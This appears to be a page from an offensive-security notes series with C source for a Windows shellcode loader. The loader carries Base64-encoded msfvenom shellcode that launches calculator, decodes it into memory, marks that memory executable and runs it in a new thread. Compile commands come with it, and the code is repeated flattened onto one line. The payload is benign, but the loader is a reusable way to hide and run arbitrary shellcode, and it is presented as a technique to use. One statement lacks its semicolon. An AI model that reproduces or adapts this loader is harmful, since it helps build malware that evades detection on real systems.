Base64 Encode Shellcode

Base64 encoding the shellcode to launch calculator.

// To compile on Windows:
// cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccalc.cpp /link /OUT:ccl.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
// To compile on linux: 
// x86_64-w64-mingw32-gcc -O2 calc.c -o cc.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive -lcrypt32

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <Wincrypt.h>
#pragma comment (lib, "Crypt32.Lib")

// msfvenom -p windows/x64/exec CMD=calc.exe -f base64
// Storing payload in Heap (.data section) 
unsigned char calc_payload[] = "/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA";
unsigned int calc_len = sizeof(calc_payload);


int DecodeBase64( const BYTE * src, unsigned int srcLen, char * dst, unsigned int dstLen ) {

	DWORD outLen;
	BOOL fRet;

	outLen = dstLen;
	fRet = CryptStringToBinary( (LPCSTR) src, srcLen, CRYPT_STRING_BASE64, (BYTE * )dst, &outLen, NULL, NULL);
	
	if (!fRet) outLen = 0;  // failed
	
	return( outLen );
}


int main(void) {
    
	void * exec_mem;
	BOOL rv;
	HANDLE th;
	DWORD oldprotect = 0;
	
	exec_mem = VirtualAlloc(0, calc_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)

	// Decode the payload back to binary form
	DecodeBase64(
		(const BYTE *)calc_payload,	// Source
		calc_len,			// Source length
		(char *) exec_mem,		// Destination
		calc_len			// Destination length
		);
	
	// Change protection to Execute
	rv = VirtualProtect(exec_mem, calc_len, PAGE_EXECUTE_READ, &oldprotect);


	if ( rv != 0 ) {
			th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
			WaitForSingleObject(th, -1);
	}

	return 0;
}

PreviousNot so easy to stage!NextCaesar Cipher (ROT 13) Encrypt Shellcode

Last updated 2 years ago

// To compile on Windows: // cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccalc.cpp /link /OUT:ccl.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 // To compile on linux: // x86_64-w64-mingw32-gcc -O2 calc.c -o cc.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive -lcrypt32 #include <windows.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <Wincrypt.h> #pragma comment (lib, "Crypt32.Lib") // msfvenom -p windows/x64/exec CMD=calc.exe -f base64 // Storing payload in Heap (.data section) unsigned char calc_payload[] = "/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA"; unsigned int calc_len = sizeof(calc_payload); int DecodeBase64( const BYTE * src, unsigned int srcLen, char * dst, unsigned int dstLen ) { DWORD outLen; BOOL fRet; outLen = dstLen; fRet = CryptStringToBinary( (LPCSTR) src, srcLen, CRYPT_STRING_BASE64, (BYTE * )dst, &outLen, NULL, NULL); if (!fRet) outLen = 0; // failed return( outLen ); } int main(void) { void * exec_mem; BOOL rv; HANDLE th; DWORD oldprotect = 0; exec_mem = VirtualAlloc(0, calc_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE) // Decode the payload back to binary form DecodeBase64( (const BYTE *)calc_payload, // Source calc_len, // Source length (char *) exec_mem, // Destination calc_len // Destination length ); // Change protection to Execute rv = VirtualProtect(exec_mem, calc_len, PAGE_EXECUTE_READ, &oldprotect); if ( rv != 0 ) { th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0); WaitForSingleObject(th, -1); } return 0; }